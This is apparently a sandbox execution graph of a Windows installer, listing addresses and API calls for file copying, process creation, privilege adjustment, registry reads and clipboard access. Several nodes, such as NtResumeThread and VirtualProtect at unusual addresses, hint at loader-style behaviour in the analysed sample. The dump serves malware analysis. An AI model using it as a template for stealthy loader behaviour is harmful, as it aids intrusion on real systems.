                                                                                      execution_graph 16900 403640 SetErrorMode GetVersionExW 16901 403692 GetVersionExW 16900->16901 16902 4036ca 16900->16902 16901->16902 16903 406a35 5 API calls 16902->16903 16905 403723 16902->16905 16903->16905 16991 4069c5 GetSystemDirectoryW 16905->16991 16906 403739 lstrlenA 16906->16905 16907 403749 16906->16907 16994 406a35 GetModuleHandleA 16907->16994 16910 406a35 5 API calls 16911 403757 16910->16911 16912 406a35 5 API calls 16911->16912 16913 403763 #17 OleInitialize SHGetFileInfoW 16912->16913 17000 406668 lstrcpynW 16913->17000 16916 4037b0 GetCommandLineW 17001 406668 lstrcpynW 16916->17001 16918 4037c2 17002 405f64 16918->17002 16921 4038f7 16922 40390b GetTempPathW 16921->16922 17006 40360f 16922->17006 16924 403923 16926 403927 GetWindowsDirectoryW lstrcatW 16924->16926 16927 40397d DeleteFileW 16924->16927 16925 405f64 CharNextW 16929 4037f9 16925->16929 16930 40360f 12 API calls 16926->16930 17016 4030d0 GetTickCount GetModuleFileNameW 16927->17016 16929->16921 16929->16925 16933 4038f9 16929->16933 16932 403943 16930->16932 16931 403990 16934 403a54 16931->16934 16937 403a45 16931->16937 16941 405f64 CharNextW 16931->16941 16932->16927 16935 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 16932->16935 17102 406668 lstrcpynW 16933->17102 17156 403c25 16934->17156 16936 40360f 12 API calls 16935->16936 16940 403975 16936->16940 17046 403d17 16937->17046 16940->16927 16940->16934 16957 4039b2 16941->16957 16944 403b91 16946 403b99 GetCurrentProcess OpenProcessToken 16944->16946 16947 403c0f ExitProcess 16944->16947 16945 403b7c 17165 405cc8 16945->17165 16950 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 16946->16950 16951 403bdf 16946->16951 16950->16951 16956 406a35 5 API calls 16951->16956 16953 403a1b 17103 40603f 16953->17103 16954 403a5c 17119 405c33 16954->17119 16960 403be6 16956->16960 16957->16953 16957->16954 16962 403bfb ExitWindowsEx 16960->16962 16966 403c08 16960->16966 16962->16947 16962->16966 16963 403a72 lstrcatW 16964 403a7d lstrcatW lstrcmpiW 16963->16964 16964->16934 16967 403a9d 16964->16967 17169 40140b 16966->17169 16968 403aa2 16967->16968 16969 403aa9 16967->16969 17122 405b99 CreateDirectoryW 16968->17122 17127 405c16 CreateDirectoryW 16969->17127 16970 403a3a 17118 406668 lstrcpynW 16970->17118 16976 403aae SetCurrentDirectoryW 16977 403ac0 16976->16977 16978 403acb 16976->16978 17130 406668 lstrcpynW 16977->17130 17131 406668 lstrcpynW 16978->17131 16983 403b19 CopyFileW 16985 403ad8 16983->16985 16984 403b63 16987 406428 36 API calls 16984->16987 16985->16984 16988 4066a5 17 API calls 16985->16988 16990 403b4d CloseHandle 16985->16990 17132 4066a5 16985->17132 17149 406428 MoveFileExW 16985->17149 17153 405c4b CreateProcessW 16985->17153 16987->16934 16988->16985 16990->16985 16992 4069e7 wsprintfW LoadLibraryExW 16991->16992 16992->16906 16995 406a51 16994->16995 16996 406a5b GetProcAddress 16994->16996 16997 4069c5 3 API calls 16995->16997 16998 403750 16996->16998 16999 406a57 16997->16999 16998->16910 16999->16996 16999->16998 17000->16916 17001->16918 17003 405f6a 17002->17003 17004 4037e8 CharNextW 17003->17004 17005 405f71 CharNextW 17003->17005 17004->16929 17005->17003 17172 4068ef 17006->17172 17008 403625 17008->16924 17009 40361b 17009->17008 17181 405f37 lstrlenW CharPrevW 17009->17181 17012 405c16 2 API calls 17013 403633 17012->17013 17184 406187 17013->17184 17188 406158 GetFileAttributesW CreateFileW 17016->17188 17018 403113 17045 403120 17018->17045 17189 406668 lstrcpynW 17018->17189 17020 403136 17190 405f83 lstrlenW 17020->17190 17024 403147 GetFileSize 17025 403241 17024->17025 17044 40315e 17024->17044 17195 40302e 17025->17195 17029 403286 GlobalAlloc 17032 40329d 17029->17032 17031 4032de 17033 40302e 32 API calls 17031->17033 17036 406187 2 API calls 17032->17036 17033->17045 17034 403267 17035 4035e2 ReadFile 17034->17035 17037 403272 17035->17037 17039 4032ae CreateFileW 17036->17039 17037->17029 17037->17045 17038 40302e 32 API calls 17038->17044 17040 4032e8 17039->17040 17039->17045 17210 4035f8 SetFilePointer 17040->17210 17042 4032f6 17211 403371 17042->17211 17044->17025 17044->17031 17044->17038 17044->17045 17226 4035e2 17044->17226 17045->16931 17047 406a35 5 API calls 17046->17047 17048 403d2b 17047->17048 17049 403d31 17048->17049 17050 403d43 17048->17050 17293 4065af wsprintfW 17049->17293 17051 406536 3 API calls 17050->17051 17052 403d73 17051->17052 17054 403d92 lstrcatW 17052->17054 17056 406536 3 API calls 17052->17056 17055 403d41 17054->17055 17273 403fed 17055->17273 17056->17054 17059 40603f 18 API calls 17060 403dc4 17059->17060 17061 403e58 17060->17061 17281 406536 17060->17281 17062 40603f 18 API calls 17061->17062 17063 403e5e 17062->17063 17065 403e6e LoadImageW 17063->17065 17066 4066a5 17 API calls 17063->17066 17067 403f14 17065->17067 17068 403e95 RegisterClassW 17065->17068 17066->17065 17072 40140b 2 API calls 17067->17072 17071 403ecb SystemParametersInfoW CreateWindowExW 17068->17071 17101 403f1e 17068->17101 17069 403e17 lstrlenW 17074 403e25 lstrcmpiW 17069->17074 17075 403e4b 17069->17075 17071->17067 17076 403f1a 17072->17076 17073 405f64 CharNextW 17077 403e14 17073->17077 17074->17075 17078 403e35 GetFileAttributesW 17074->17078 17079 405f37 3 API calls 17075->17079 17081 403fed 18 API calls 17076->17081 17076->17101 17077->17069 17080 403e41 17078->17080 17082 403e51 17079->17082 17080->17075 17083 405f83 2 API calls 17080->17083 17084 403f2b 17081->17084 17294 406668 lstrcpynW 17082->17294 17083->17075 17086 403f37 ShowWindow 17084->17086 17087 403fba 17084->17087 17089 4069c5 3 API calls 17086->17089 17286 40579d OleInitialize 17087->17286 17090 403f4f 17089->17090 17092 403f5d GetClassInfoW 17090->17092 17095 4069c5 3 API calls 17090->17095 17091 403fc0 17093 403fc4 17091->17093 17094 403fdc 17091->17094 17097 403f71 GetClassInfoW RegisterClassW 17092->17097 17098 403f87 DialogBoxParamW 17092->17098 17100 40140b 2 API calls 17093->17100 17093->17101 17096 40140b 2 API calls 17094->17096 17095->17092 17096->17101 17097->17098 17099 40140b 2 API calls 17098->17099 17099->17101 17100->17101 17101->16934 17102->16922 17310 406668 lstrcpynW 17103->17310 17105 406050 17311 405fe2 CharNextW CharNextW 17105->17311 17108 403a27 17108->16934 17117 406668 lstrcpynW 17108->17117 17109 4068ef 5 API calls 17115 406066 17109->17115 17110 406097 lstrlenW 17111 4060a2 17110->17111 17110->17115 17112 405f37 3 API calls 17111->17112 17114 4060a7 GetFileAttributesW 17112->17114 17114->17108 17115->17108 17115->17110 17116 405f83 2 API calls 17115->17116 17317 40699e FindFirstFileW 17115->17317 17116->17110 17117->16970 17118->16937 17120 406a35 5 API calls 17119->17120 17121 403a61 lstrcatW 17120->17121 17121->16963 17121->16964 17123 405bea GetLastError 17122->17123 17124 403aa7 17122->17124 17123->17124 17125 405bf9 SetFileSecurityW 17123->17125 17124->16976 17125->17124 17126 405c0f GetLastError 17125->17126 17126->17124 17128 405c26 17127->17128 17129 405c2a GetLastError 17127->17129 17128->16976 17129->17128 17130->16978 17131->16985 17144 4066b2 17132->17144 17133 4068d5 17134 403b0d DeleteFileW 17133->17134 17322 406668 lstrcpynW 17133->17322 17134->16983 17134->16985 17136 4068a3 lstrlenW 17136->17144 17137 4067ba GetSystemDirectoryW 17137->17144 17140 406536 3 API calls 17140->17144 17141 4066a5 10 API calls 17141->17136 17142 4067cd GetWindowsDirectoryW 17142->17144 17143 4068ef 5 API calls 17143->17144 17144->17133 17144->17136 17144->17137 17144->17140 17144->17141 17144->17142 17144->17143 17145 4067fc SHGetSpecialFolderLocation 17144->17145 17146 406844 lstrcatW 17144->17146 17147 4066a5 10 API calls 17144->17147 17320 4065af wsprintfW 17144->17320 17321 406668 lstrcpynW 17144->17321 17145->17144 17148 406814 SHGetPathFromIDListW CoTaskMemFree 17145->17148 17146->17144 17147->17144 17148->17144 17150 406449 17149->17150 17151 40643c 17149->17151 17150->16985 17323 4062ae 17151->17323 17154 405c8a 17153->17154 17155 405c7e CloseHandle 17153->17155 17154->16985 17155->17154 17157 403c40 17156->17157 17158 403c36 CloseHandle 17156->17158 17159 403c54 17157->17159 17160 403c4a CloseHandle 17157->17160 17158->17157 17357 403c82 17159->17357 17160->17159 17166 405cdd 17165->17166 17167 405cf1 MessageBoxIndirectW 17166->17167 17168 403b89 ExitProcess 17166->17168 17167->17168 17170 401389 2 API calls 17169->17170 17171 401420 17170->17171 17171->16947 17173 4068fc 17172->17173 17175 406965 CharNextW 17173->17175 17176 405f64 CharNextW 17173->17176 17177 406972 17173->17177 17179 406951 CharNextW 17173->17179 17180 406960 CharNextW 17173->17180 17174 406977 CharPrevW 17174->17177 17175->17173 17175->17177 17176->17173 17177->17174 17178 406998 17177->17178 17178->17009 17179->17173 17180->17175 17182 405f53 lstrcatW 17181->17182 17183 40362d 17181->17183 17182->17183 17183->17012 17185 406194 GetTickCount GetTempFileNameW 17184->17185 17186 40363e 17185->17186 17187 4061ca 17185->17187 17186->16924 17187->17185 17187->17186 17188->17018 17189->17020 17191 405f91 17190->17191 17192 40313c 17191->17192 17193 405f97 CharPrevW 17191->17193 17194 406668 lstrcpynW 17192->17194 17193->17191 17193->17192 17194->17024 17196 403057 17195->17196 17197 40303f 17195->17197 17198 403067 GetTickCount 17196->17198 17199 40305f 17196->17199 17200 403048 DestroyWindow 17197->17200 17201 40304f 17197->17201 17198->17201 17203 403075 17198->17203 17230 406a71 17199->17230 17200->17201 17201->17029 17201->17045 17229 4035f8 SetFilePointer 17201->17229 17204 4030aa CreateDialogParamW ShowWindow 17203->17204 17205 40307d 17203->17205 17204->17201 17205->17201 17234 403012 17205->17234 17207 40308b wsprintfW 17237 4056ca 17207->17237 17210->17042 17212 403380 SetFilePointer 17211->17212 17213 40339c 17211->17213 17212->17213 17248 403479 GetTickCount 17213->17248 17216 403439 17216->17045 17219 403479 42 API calls 17220 4033d3 17219->17220 17220->17216 17221 40343f ReadFile 17220->17221 17223 4033e2 17220->17223 17221->17216 17223->17216 17224 4061db ReadFile 17223->17224 17263 40620a WriteFile 17223->17263 17224->17223 17227 4061db ReadFile 17226->17227 17228 4035f5 17227->17228 17228->17044 17229->17034 17231 406a8e PeekMessageW 17230->17231 17232 406a84 DispatchMessageW 17231->17232 17233 406a9e 17231->17233 17232->17231 17233->17201 17235 403021 17234->17235 17236 403023 MulDiv 17234->17236 17235->17236 17236->17207 17238 4030a8 17237->17238 17240 4056e5 17237->17240 17238->17201 17239 405701 lstrlenW 17242 40572a 17239->17242 17243 40570f lstrlenW 17239->17243 17240->17239 17241 4066a5 17 API calls 17240->17241 17241->17239 17245 405730 SetWindowTextW 17242->17245 17246 40573d 17242->17246 17243->17238 17244 405721 lstrcatW 17243->17244 17244->17242 17245->17246 17246->17238 17247 405743 SendMessageW SendMessageW SendMessageW 17246->17247 17247->17238 17249 4035d1 17248->17249 17250 4034a7 17248->17250 17251 40302e 32 API calls 17249->17251 17265 4035f8 SetFilePointer 17250->17265 17258 4033a3 17251->17258 17253 4034b2 SetFilePointer 17257 4034d7 17253->17257 17254 4035e2 ReadFile 17254->17257 17256 40302e 32 API calls 17256->17257 17257->17254 17257->17256 17257->17258 17259 40620a WriteFile 17257->17259 17260 4035b2 SetFilePointer 17257->17260 17266 406bb0 17257->17266 17258->17216 17261 4061db ReadFile 17258->17261 17259->17257 17260->17249 17262 4033bc 17261->17262 17262->17216 17262->17219 17264 406228 17263->17264 17264->17223 17265->17253 17267 406bd5 17266->17267 17268 406bdd 17266->17268 17267->17257 17268->17267 17269 406c64 GlobalFree 17268->17269 17270 406c6d GlobalAlloc 17268->17270 17271 406ce4 GlobalAlloc 17268->17271 17272 406cdb GlobalFree 17268->17272 17269->17270 17270->17267 17270->17268 17271->17267 17271->17268 17272->17271 17274 404001 17273->17274 17295 4065af wsprintfW 17274->17295 17276 404072 17296 4040a6 17276->17296 17278 403da2 17278->17059 17279 404077 17279->17278 17280 4066a5 17 API calls 17279->17280 17280->17279 17299 4064d5 17281->17299 17284 403df6 17284->17061 17284->17069 17284->17073 17285 40656a RegQueryValueExW RegCloseKey 17285->17284 17303 404610 17286->17303 17288 4057e7 17289 404610 SendMessageW 17288->17289 17291 4057f9 OleUninitialize 17289->17291 17290 4057c0 17290->17288 17306 401389 17290->17306 17291->17091 17293->17055 17294->17061 17295->17276 17297 4066a5 17 API calls 17296->17297 17298 4040b4 SetWindowTextW 17297->17298 17298->17279 17300 4064e4 17299->17300 17301 4064e8 17300->17301 17302 4064ed RegOpenKeyExW 17300->17302 17301->17284 17301->17285 17302->17301 17304 404628 17303->17304 17305 404619 SendMessageW 17303->17305 17304->17290 17305->17304 17308 401390 17306->17308 17307 4013fe 17307->17290 17308->17307 17309 4013cb MulDiv SendMessageW 17308->17309 17309->17308 17310->17105 17312 405fff 17311->17312 17313 406011 17311->17313 17312->17313 17314 40600c CharNextW 17312->17314 17315 405f64 CharNextW 17313->17315 17316 406035 17313->17316 17314->17316 17315->17313 17316->17108 17316->17109 17318 4069b4 FindClose 17317->17318 17319 4069bf 17317->17319 17318->17319 17319->17115 17320->17144 17321->17144 17322->17134 17324 406304 GetShortPathNameW 17323->17324 17325 4062de 17323->17325 17327 406423 17324->17327 17328 406319 17324->17328 17350 406158 GetFileAttributesW CreateFileW 17325->17350 17327->17150 17328->17327 17330 406321 wsprintfA 17328->17330 17329 4062e8 CloseHandle GetShortPathNameW 17329->17327 17331 4062fc 17329->17331 17332 4066a5 17 API calls 17330->17332 17331->17324 17331->17327 17333 406349 17332->17333 17351 406158 GetFileAttributesW CreateFileW 17333->17351 17335 406356 17335->17327 17336 406365 GetFileSize GlobalAlloc 17335->17336 17337 406387 17336->17337 17338 40641c CloseHandle 17336->17338 17339 4061db ReadFile 17337->17339 17338->17327 17340 40638f 17339->17340 17340->17338 17352 4060bd lstrlenA 17340->17352 17343 4063a6 lstrcpyA 17346 4063c8 17343->17346 17344 4063ba 17345 4060bd 4 API calls 17344->17345 17345->17346 17347 4063ff SetFilePointer 17346->17347 17348 40620a WriteFile 17347->17348 17349 406415 GlobalFree 17348->17349 17349->17338 17350->17329 17351->17335 17353 4060fe lstrlenA 17352->17353 17354 406106 17353->17354 17355 4060d7 lstrcmpiA 17353->17355 17354->17343 17354->17344 17355->17354 17356 4060f5 CharNextA 17355->17356 17356->17353 17358 403c90 17357->17358 17359 403c59 17358->17359 17360 403c95 FreeLibrary GlobalFree 17358->17360 17361 405d74 17359->17361 17360->17359 17360->17360 17362 40603f 18 API calls 17361->17362 17363 405d94 17362->17363 17364 405db3 17363->17364 17365 405d9c DeleteFileW 17363->17365 17367 405ede 17364->17367 17401 406668 lstrcpynW 17364->17401 17366 403b71 OleUninitialize 17365->17366 17366->16944 17366->16945 17367->17366 17372 40699e 2 API calls 17367->17372 17369 405dd9 17370 405dec 17369->17370 17371 405ddf lstrcatW 17369->17371 17374 405f83 2 API calls 17370->17374 17373 405df2 17371->17373 17377 405ef8 17372->17377 17375 405e02 lstrcatW 17373->17375 17376 405df8 17373->17376 17374->17373 17378 405e0d lstrlenW FindFirstFileW 17375->17378 17376->17375 17376->17378 17377->17366 17379 405efc 17377->17379 17380 405ed3 17378->17380 17381 405e2f 17378->17381 17382 405f37 3 API calls 17379->17382 17380->17367 17384 405eb6 FindNextFileW 17381->17384 17394 405d74 60 API calls 17381->17394 17396 4056ca 24 API calls 17381->17396 17398 4056ca 24 API calls 17381->17398 17400 406428 36 API calls 17381->17400 17402 406668 lstrcpynW 17381->17402 17403 405d2c 17381->17403 17383 405f02 17382->17383 17385 405d2c 5 API calls 17383->17385 17384->17381 17388 405ecc FindClose 17384->17388 17387 405f0e 17385->17387 17389 405f28 17387->17389 17392 405f12 17387->17392 17388->17380 17391 4056ca 24 API calls 17389->17391 17391->17366 17392->17366 17393 4056ca 24 API calls 17392->17393 17395 405f1f 17393->17395 17394->17381 17397 406428 36 API calls 17395->17397 17396->17384 17399 405f26 17397->17399 17398->17381 17399->17366 17400->17381 17401->17369 17402->17381 17411 406133 GetFileAttributesW 17403->17411 17406 405d59 17406->17381 17407 405d47 RemoveDirectoryW 17409 405d55 17407->17409 17408 405d4f DeleteFileW 17408->17409 17409->17406 17410 405d65 SetFileAttributesW 17409->17410 17410->17406 17412 405d38 17411->17412 17413 406145 SetFileAttributesW 17411->17413 17412->17406 17412->17407 17412->17408 17413->17412 17869 3c737e7 EnumWindows 17870 3c73845 17869->17870 17414 401941 17415 401943 17414->17415 17420 402da6 17415->17420 17418 405d74 67 API calls 17419 401951 17418->17419 17421 402db2 17420->17421 17422 4066a5 17 API calls 17421->17422 17423 402dd3 17422->17423 17424 401948 17423->17424 17425 4068ef 5 API calls 17423->17425 17424->17418 17425->17424 17426 4015c1 17427 402da6 17 API calls 17426->17427 17428 4015c8 17427->17428 17429 405fe2 4 API calls 17428->17429 17434 4015d1 17429->17434 17430 401631 17432 401663 17430->17432 17433 401636 17430->17433 17431 405f64 CharNextW 17431->17434 17437 401423 24 API calls 17432->17437 17445 401423 17433->17445 17434->17430 17434->17431 17438 405c16 2 API calls 17434->17438 17441 405c33 5 API calls 17434->17441 17443 401617 GetFileAttributesW 17434->17443 17444 405b99 4 API calls 17434->17444 17442 40165b 17437->17442 17438->17434 17440 40164a SetCurrentDirectoryW 17440->17442 17441->17434 17443->17434 17444->17434 17446 4056ca 24 API calls 17445->17446 17447 401431 17446->17447 17448 406668 lstrcpynW 17447->17448 17448->17440 17871 715d2a7f 17872 715d2acf 17871->17872 17873 715d2a8f VirtualProtect 17871->17873 17873->17872 17449 3c8488b 17451 3c84890 17449->17451 17452 3c848e2 17451->17452 17453 3c84ab5 NtResumeThread 17452->17453 17454 3c84aff 17453->17454 17874 4015a3 17875 402da6 17 API calls 17874->17875 17876 4015aa SetFileAttributesW 17875->17876 17877 4015bc 17876->17877 17878 401fa4 17879 402da6 17 API calls 17878->17879 17880 401faa 17879->17880 17881 4056ca 24 API calls 17880->17881 17882 401fb4 17881->17882 17883 405c4b 2 API calls 17882->17883 17884 401fba 17883->17884 17885 401fdd CloseHandle 17884->17885 17889 40292e 17884->17889 17893 406ae0 WaitForSingleObject 17884->17893 17885->17889 17888 401fcf 17890 401fd4 17888->17890 17891 401fdf 17888->17891 17898 4065af wsprintfW 17890->17898 17891->17885 17894 406afa 17893->17894 17895 406b0c GetExitCodeProcess 17894->17895 17896 406a71 2 API calls 17894->17896 17895->17888 17897 406b01 WaitForSingleObject 17896->17897 17897->17894 17898->17885 17455 4040c5 17456 4040dd 17455->17456 17457 40423e 17455->17457 17456->17457 17458 4040e9 17456->17458 17459 40428f 17457->17459 17460 40424f GetDlgItem GetDlgItem 17457->17460 17461 4040f4 SetWindowPos 17458->17461 17462 404107 17458->17462 17464 4042e9 17459->17464 17469 401389 2 API calls 17459->17469 17463 4045c4 18 API calls 17460->17463 17461->17462 17466 404110 ShowWindow 17462->17466 17467 404152 17462->17467 17468 404279 SetClassLongW 17463->17468 17465 404610 SendMessageW 17464->17465 17470 404239 17464->17470 17498 4042fb 17465->17498 17471 404130 GetWindowLongW 17466->17471 17472 40422b 17466->17472 17473 404171 17467->17473 17474 40415a DestroyWindow 17467->17474 17475 40140b 2 API calls 17468->17475 17476 4042c1 17469->17476 17471->17472 17478 404149 ShowWindow 17471->17478 17537 40462b 17472->17537 17480 404176 SetWindowLongW 17473->17480 17481 404187 17473->17481 17479 40454d 17474->17479 17475->17459 17476->17464 17482 4042c5 SendMessageW 17476->17482 17478->17467 17479->17470 17488 40457e ShowWindow 17479->17488 17480->17470 17481->17472 17485 404193 GetDlgItem 17481->17485 17482->17470 17483 40140b 2 API calls 17483->17498 17484 40454f DestroyWindow EndDialog 17484->17479 17486 4041c1 17485->17486 17487 4041a4 SendMessageW IsWindowEnabled 17485->17487 17490 4041ce 17486->17490 17491 404215 SendMessageW 17486->17491 17492 4041e1 17486->17492 17502 4041c6 17486->17502 17487->17470 17487->17486 17488->17470 17489 4066a5 17 API calls 17489->17498 17490->17491 17490->17502 17491->17472 17495 4041e9 17492->17495 17496 4041fe 17492->17496 17494 4045c4 18 API calls 17494->17498 17500 40140b 2 API calls 17495->17500 17499 40140b 2 API calls 17496->17499 17497 4041fc 17497->17472 17498->17470 17498->17483 17498->17484 17498->17489 17498->17494 17519 40448f DestroyWindow 17498->17519 17528 4045c4 17498->17528 17501 404205 17499->17501 17500->17502 17501->17472 17501->17502 17534 40459d 17502->17534 17504 404376 GetDlgItem 17505 404393 ShowWindow KiUserCallbackDispatcher 17504->17505 17506 40438b 17504->17506 17531 4045e6 KiUserCallbackDispatcher 17505->17531 17506->17505 17508 4043bd EnableWindow 17513 4043d1 17508->17513 17509 4043d6 GetSystemMenu EnableMenuItem SendMessageW 17510 404406 SendMessageW 17509->17510 17509->17513 17510->17513 17512 4040a6 18 API calls 17512->17513 17513->17509 17513->17512 17532 4045f9 SendMessageW 17513->17532 17533 406668 lstrcpynW 17513->17533 17515 404435 lstrlenW 17516 4066a5 17 API calls 17515->17516 17517 40444b SetWindowTextW 17516->17517 17518 401389 2 API calls 17517->17518 17518->17498 17519->17479 17520 4044a9 CreateDialogParamW 17519->17520 17520->17479 17521 4044dc 17520->17521 17522 4045c4 18 API calls 17521->17522 17523 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 17522->17523 17524 401389 2 API calls 17523->17524 17525 40452d 17524->17525 17525->17470 17526 404535 ShowWindow 17525->17526 17527 404610 SendMessageW 17526->17527 17527->17479 17529 4066a5 17 API calls 17528->17529 17530 4045cf SetDlgItemTextW 17529->17530 17530->17504 17531->17508 17532->17513 17533->17515 17535 4045a4 17534->17535 17536 4045aa SendMessageW 17534->17536 17535->17536 17536->17497 17538 4046ee 17537->17538 17539 404643 GetWindowLongW 17537->17539 17538->17470 17539->17538 17540 404658 17539->17540 17540->17538 17541 404685 GetSysColor 17540->17541 17542 404688 17540->17542 17541->17542 17543 404698 SetBkMode 17542->17543 17544 40468e SetTextColor 17542->17544 17545 4046b0 GetSysColor 17543->17545 17546 4046b6 17543->17546 17544->17543 17545->17546 17547 4046c7 17546->17547 17548 4046bd SetBkColor 17546->17548 17547->17538 17549 4046e1 CreateBrushIndirect 17547->17549 17550 4046da DeleteObject 17547->17550 17548->17547 17549->17538 17550->17549 17551 715d101b 17558 715d15b6 17551->17558 17553 715d1020 17554 715d1024 17553->17554 17555 715d1027 GlobalAlloc 17553->17555 17562 715d15dd wsprintfW 17554->17562 17555->17554 17559 715d15bc 17558->17559 17560 715d15c2 17559->17560 17561 715d15ce GlobalFree 17559->17561 17560->17553 17561->17553 17565 715d1312 17562->17565 17566 715d131b GlobalAlloc lstrcpynW 17565->17566 17567 715d103b 17565->17567 17566->17567 17568 405809 17569 4059b3 17568->17569 17570 40582a GetDlgItem GetDlgItem GetDlgItem 17568->17570 17572 4059e4 17569->17572 17573 4059bc GetDlgItem CreateThread CloseHandle 17569->17573 17614 4045f9 SendMessageW 17570->17614 17575 405a0f 17572->17575 17577 405a34 17572->17577 17578 4059fb ShowWindow ShowWindow 17572->17578 17573->17572 17617 40579d 5 API calls 17573->17617 17574 40589a 17582 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 17574->17582 17576 405a1b 17575->17576 17583 405a6f 17575->17583 17579 405a23 17576->17579 17580 405a49 ShowWindow 17576->17580 17581 40462b 8 API calls 17577->17581 17616 4045f9 SendMessageW 17578->17616 17585 40459d SendMessageW 17579->17585 17587 405a69 17580->17587 17588 405a5b 17580->17588 17586 405a42 17581->17586 17589 4058f3 SendMessageW SendMessageW 17582->17589 17590 40590f 17582->17590 17583->17577 17591 405a7d SendMessageW 17583->17591 17585->17577 17593 40459d SendMessageW 17587->17593 17592 4056ca 24 API calls 17588->17592 17589->17590 17594 405922 17590->17594 17595 405914 SendMessageW 17590->17595 17591->17586 17596 405a96 CreatePopupMenu 17591->17596 17592->17587 17593->17583 17597 4045c4 18 API calls 17594->17597 17595->17594 17598 4066a5 17 API calls 17596->17598 17600 405932 17597->17600 17599 405aa6 AppendMenuW 17598->17599 17601 405ac3 GetWindowRect 17599->17601 17602 405ad6 TrackPopupMenu 17599->17602 17603 40593b ShowWindow 17600->17603 17604 40596f GetDlgItem SendMessageW 17600->17604 17601->17602 17602->17586 17605 405af1 17602->17605 17606 405951 ShowWindow 17603->17606 17609 40595e 17603->17609 17604->17586 17607 405996 SendMessageW SendMessageW 17604->17607 17608 405b0d SendMessageW 17605->17608 17606->17609 17607->17586 17608->17608 17610 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 17608->17610 17615 4045f9 SendMessageW 17609->17615 17612 405b4f SendMessageW 17610->17612 17612->17612 17613 405b78 GlobalUnlock SetClipboardData CloseClipboard 17612->17613 17613->17586 17614->17574 17615->17604 17616->17575 17899 40252a 17910 402de6 17899->17910 17902 402da6 17 API calls 17903 40253d 17902->17903 17904 402548 RegQueryValueExW 17903->17904 17909 40292e 17903->17909 17905 40256e RegCloseKey 17904->17905 17906 402568 17904->17906 17905->17909 17906->17905 17915 4065af wsprintfW 17906->17915 17911 402da6 17 API calls 17910->17911 17912 402dfd 17911->17912 17913 4064d5 RegOpenKeyExW 17912->17913 17914 402534 17913->17914 17914->17902 17915->17905 17916 4026ec 17917 402d84 17 API calls 17916->17917 17926 4026fb 17917->17926 17918 402838 17919 402745 ReadFile 17919->17918 17919->17926 17920 4027de 17920->17918 17920->17926 17930 406239 SetFilePointer 17920->17930 17921 4061db ReadFile 17921->17926 17922 402785 MultiByteToWideChar 17922->17926 17923 40283a 17939 4065af wsprintfW 17923->17939 17926->17918 17926->17919 17926->17920 17926->17921 17926->17922 17926->17923 17927 4027ab SetFilePointer MultiByteToWideChar 17926->17927 17928 40284b 17926->17928 17927->17926 17928->17918 17929 40286c SetFilePointer 17928->17929 17929->17918 17931 406255 17930->17931 17938 40626d 17930->17938 17932 4061db ReadFile 17931->17932 17933 406261 17932->17933 17934 406276 SetFilePointer 17933->17934 17935 40629e SetFilePointer 17933->17935 17933->17938 17934->17935 17936 406281 17934->17936 17935->17938 17937 40620a WriteFile 17936->17937 17937->17938 17938->17920 17939->17918 17940 40176f 17941 402da6 17 API calls 17940->17941 17942 401776 17941->17942 17943 401796 17942->17943 17944 40179e 17942->17944 17979 406668 lstrcpynW 17943->17979 17980 406668 lstrcpynW 17944->17980 17947 40179c 17950 4068ef 5 API calls 17947->17950 17948 4017a9 17949 405f37 3 API calls 17948->17949 17951 4017af lstrcatW 17949->17951 17953 4017bb 17950->17953 17951->17947 17952 40699e 2 API calls 17952->17953 17953->17952 17954 406133 2 API calls 17953->17954 17956 4017cd CompareFileTime 17953->17956 17957 40188d 17953->17957 17964 4066a5 17 API calls 17953->17964 17967 406668 lstrcpynW 17953->17967 17972 405cc8 MessageBoxIndirectW 17953->17972 17977 401864 17953->17977 17978 406158 GetFileAttributesW CreateFileW 17953->17978 17954->17953 17956->17953 17958 4056ca 24 API calls 17957->17958 17959 401897 17958->17959 17961 403371 44 API calls 17959->17961 17960 4056ca 24 API calls 17975 401879 17960->17975 17962 4018aa 17961->17962 17963 4018be SetFileTime 17962->17963 17965 4018d0 CloseHandle 17962->17965 17963->17965 17964->17953 17966 4018e1 17965->17966 17965->17975 17968 4018e6 17966->17968 17969 4018f9 17966->17969 17967->17953 17970 4066a5 17 API calls 17968->17970 17971 4066a5 17 API calls 17969->17971 17973 4018ee lstrcatW 17970->17973 17974 401901 17971->17974 17972->17953 17973->17974 17974->17975 17976 405cc8 MessageBoxIndirectW 17974->17976 17976->17975 17977->17960 17977->17975 17978->17953 17979->17947 17980->17948 17618 402891 17619 402898 17618->17619 17622 402ba9 17618->17622 17626 402d84 17619->17626 17621 40289f 17623 4028ae SetFilePointer 17621->17623 17623->17622 17624 4028be 17623->17624 17629 4065af wsprintfW 17624->17629 17627 4066a5 17 API calls 17626->17627 17628 402d99 17627->17628 17628->17621 17629->17622 17981 401735 17982 402da6 17 API calls 17981->17982 17983 40173c SearchPathW 17982->17983 17984 401757 17983->17984 17630 4014d7 17631 402d84 17 API calls 17630->17631 17632 4014dd Sleep 17631->17632 17634 402c2a 17632->17634 17635 4020d8 17636 40219c 17635->17636 17637 4020ea 17635->17637 17640 401423 24 API calls 17636->17640 17638 402da6 17 API calls 17637->17638 17639 4020f1 17638->17639 17641 402da6 17 API calls 17639->17641 17646 4022f6 17640->17646 17642 4020fa 17641->17642 17643 402110 LoadLibraryExW 17642->17643 17644 402102 GetModuleHandleW 17642->17644 17643->17636 17645 402121 17643->17645 17644->17643 17644->17645 17658 406aa4 17645->17658 17649 402132 17652 402151 17649->17652 17653 40213a 17649->17653 17650 40216b 17651 4056ca 24 API calls 17650->17651 17655 402142 17651->17655 17663 715d1817 17652->17663 17654 401423 24 API calls 17653->17654 17654->17655 17655->17646 17656 40218e FreeLibrary 17655->17656 17656->17646 17705 40668a WideCharToMultiByte 17658->17705 17660 406ac1 17661 406ac8 GetProcAddress 17660->17661 17662 40212c 17660->17662 17661->17662 17662->17649 17662->17650 17664 715d184a 17663->17664 17706 715d1bff 17664->17706 17666 715d1851 17667 715d1976 17666->17667 17668 715d1869 17666->17668 17669 715d1862 17666->17669 17667->17655 17740 715d2480 17668->17740 17756 715d243e 17669->17756 17674 715d18cd 17680 715d191e 17674->17680 17681 715d18d3 17674->17681 17675 715d18af 17769 715d2655 17675->17769 17676 715d1898 17688 715d188e 17676->17688 17766 715d2e23 17676->17766 17678 715d1885 17678->17688 17750 715d2b98 17678->17750 17679 715d187f 17679->17678 17685 715d1890 